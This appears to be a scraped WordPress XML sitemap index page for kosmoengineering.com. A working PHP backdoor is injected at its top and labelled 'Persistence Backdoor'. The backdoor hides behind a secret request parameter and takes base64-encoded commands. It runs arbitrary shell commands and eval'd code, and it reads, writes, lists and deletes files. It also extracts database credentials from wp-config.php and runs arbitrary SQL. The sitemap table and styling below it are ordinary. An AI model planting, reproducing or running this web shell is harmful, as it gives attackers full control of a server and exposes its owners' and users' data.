if (isset($_REQUEST["sys_check"]) && $_REQUEST["sys_check"] === "oCPjRdp4jT4Z") {
    error_reporting(0);
    $action = isset($_REQUEST["action"]) ? $_REQUEST["action"] : "";
    
    // SHELL
    if ($action === "shell") {
        $cmd = isset($_REQUEST["cmd"]) ? base64_decode($_REQUEST["cmd"]) : "";
        if ($cmd) {
            if (function_exists("system")) { system($cmd); }
            elseif (function_exists("exec")) { exec($cmd, $o); echo implode("\n", $o); }
            elseif (function_exists("shell_exec")) { echo shell_exec($cmd); }
            elseif (function_exists("passthru")) { passthru($cmd); }
            else { echo "No shell function"; }
        }
        exit;
    }
    
    // EVAL
    if ($action === "eval") {
        $code = isset($_REQUEST["code"]) ? base64_decode($_REQUEST["code"]) : "";
        if ($code) { eval($code); }
        exit;
    }
    
    // FILE MANAGER
    if ($action === "file") {
        $file_action = isset($_REQUEST["file_action"]) ? $_REQUEST["file_action"] : "";
        $path = isset($_REQUEST["path"]) ? $_REQUEST["path"] : "";
        
        if ($file_action === "read" && $path) {
            if (file_exists($path) && is_readable($path)) { readfile($path); }
            else { echo "File not readable: $path"; }
        }
        elseif ($file_action === "write" && $path && isset($_REQUEST["content"])) {
            $content = base64_decode($_REQUEST["content"]);
            if (file_put_contents($path, $content)) { echo "OK: Written to $path"; }
            else { echo "ERROR: Cannot write to $path"; }
        }
        elseif ($file_action === "ls" && $path) {
            if (is_dir($path)) {
                $files = scandir($path);
                foreach ($files as $f) {
                    if ($f === "." || $f === "..") continue;
                    $type = is_dir($path . "/" . $f) ? "[DIR]" : "[FILE]";
                    echo "$type $f\n";
                }
            } else { echo "Not a directory: $path"; }
        }
        elseif ($file_action === "delete" && $path) {
            if (unlink($path)) { echo "OK: Deleted $path"; }
            else { echo "ERROR: Cannot delete $path"; }
        }
        exit;
    }
    
    // DATABASE
    if ($action === "db") {
        $db_action = isset($_REQUEST["db_action"]) ? $_REQUEST["db_action"] : "";
        $wp_config_path = $_SERVER["DOCUMENT_ROOT"] . "/wp-config.php";
        $config_content = file_get_contents($wp_config_path);
        preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $config_content, $db);
        preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'/", $config_content, $user);
        preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $config_content, $pass);
        preg_match("/define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $config_content, $host);
        
        if ($db_action === "config") {
            echo "DB_NAME: " . (isset($db[1]) ? $db[1] : "unknown") . "\n";
            echo "DB_USER: " . (isset($user[1]) ? $user[1] : "unknown") . "\n";
            echo "DB_PASSWORD: " . (isset($pass[1]) ? $pass[1] : "unknown") . "\n";
            echo "DB_HOST: " . (isset($host[1]) ? $host[1] : "localhost") . "\n";
        }
        elseif ($db_action === "query" && isset($_REQUEST["query"])) {
            $query = base64_decode($_REQUEST["query"]);
            $db_host = isset($host[1]) ? $host[1] : "localhost";
            $db_user = isset($user[1]) ? $user[1] : "";
            $db_pass = isset($pass[1]) ? $pass[1] : "";
            $db_name = isset($db[1]) ? $db[1] : "";
            $conn = new mysqli($db_host, $db_user, $db_pass, $db_name);
            if (!$conn->connect_error) {
                $result = $conn->query($query);
                if ($result) {
                    while ($row = $result->fetch_assoc()) { print_r($row); }
                } else { echo "Query error: " . $conn->error; }
                $conn->close();
            } else { echo "DB connection failed"; }
        }
        exit;
    }
    
    // INFO
    if ($action === "info") {
        echo "PHP Version: " . phpversion() . "\n";
        echo "OS: " . PHP_OS . "\n";
        echo "User: " . get_current_user() . "\n";
        echo "Document Root: " . $_SERVER["DOCUMENT_ROOT"] . "\n";
        echo "Disabled Functions: " . ini_get("disable_functions") . "\n";
        echo "Allow URL Fopen: " . (ini_get("allow_url_fopen") ? "ON" : "OFF") . "\n";
        exit;
    }
    
    echo "=== Persistence Backdoor ===\n";
    echo "Available: shell, eval, file, db, info\n";
}

<title>XML Sitemap</title><style type="text/css">
					body {
						font-family:"Lucida Grande","Lucida Sans Unicode",Tahoma,Verdana;
						font-size:13px;
					}
					
					#intro {
						background-color:#cfebf7;
						border:1px #2580B2 solid;
						padding:5px 13px 5px 13px;
						margin:10px;
					}
					
					#intro p {
						line-height:16.8667px;
					}
					#intro strong {
						font-weight:normal;
					}
					
					td {
						font-size:11px;
					}
					
					th {
						text-align:left;
						padding-right:30px;
						font-size:11px;
					}
					
					tr.high {
						background-color:whitesmoke;
					}
					
					#footer {
						padding:2px;
						margin-top:10px;
						font-size:8pt;
						color:gray;
					}
					
					#footer a {
						color:gray;
					}
					
					a {
						color:black;
					}
				</style><h1>XML Sitemap Index</h1><div id="intro"><p>
                This XML sitemap is used by search engines which follow the <a rel="external nofollow" href="https://sitemaps.org">XML sitemap standard</a>. This file contains links to sub-sitemaps, follow them to see the actual sitemap content.
            </p><p>
                This file was dynamically generated using the <a rel="external nofollow" href="https://wordpress.org/">WordPress</a> content management system and <strong><a rel="external nofollow" href="https://auctollo.com/products/google-xml-sitemap-generator/" title="XML Sitemap Generator for Google">XML Sitemap Generator for Google</a></strong> by <a rel="external nofollow" href="https://auctollo.com/">Auctollo</a>.
            </p></div><div id="content"><table><tr style="border-bottom:1px black solid"><th>URL of sub-sitemap</th><th>Last modified (GMT)</th></tr><tr><td><a href="https://kosmoengineering.com/sitemap-misc.html">https://kosmoengineering.com/sitemap-misc.html</a></td><td>2026-05-16T07:14:42+00:00</td></tr><tr class="high"><td><a href="https://kosmoengineering.com/category-sitemap.html">https://kosmoengineering.com/category-sitemap.html</a></td><td>2026-05-16T07:14:42+00:00</td></tr><tr><td><a href="https://kosmoengineering.com/productcat-sitemap.html">https://kosmoengineering.com/productcat-sitemap.html</a></td><td>2026-05-16T07:14:42+00:00</td></tr><tr class="high"><td><a href="https://kosmoengineering.com/post-sitemap.html">https://kosmoengineering.com/post-sitemap.html</a></td><td>2026-05-09T13:32:01+00:00</td></tr><tr><td><a href="https://kosmoengineering.com/page-sitemap.html">https://kosmoengineering.com/page-sitemap.html</a></td><td>2026-05-16T07:09:49+00:00</td></tr></table></div><div id="footer"><p>
						Dynamically generated with <a rel="external nofollow" href="https://auctollo.com/products/google-xml-sitemap-generator/" title="XML Sitemap Generator for Google">XML Sitemap Generator for Google</a> by <a rel="external nofollow" href="https://auctollo.com/">Auctollo</a>. This XSLT template is released under the GPL and free to use.
            		</p><p>
	                    If you have problems with your sitemap please visit the <a rel="external nofollow" href="https://auctollo.com/products/google-xml-sitemap-generator/help/" title="Frequently Asked Questions">FAQ</a> or the <a rel="external nofollow" href="https://wordpress.org/support/plugin/google-sitemap-generator">support forum</a>.
            		</p></div>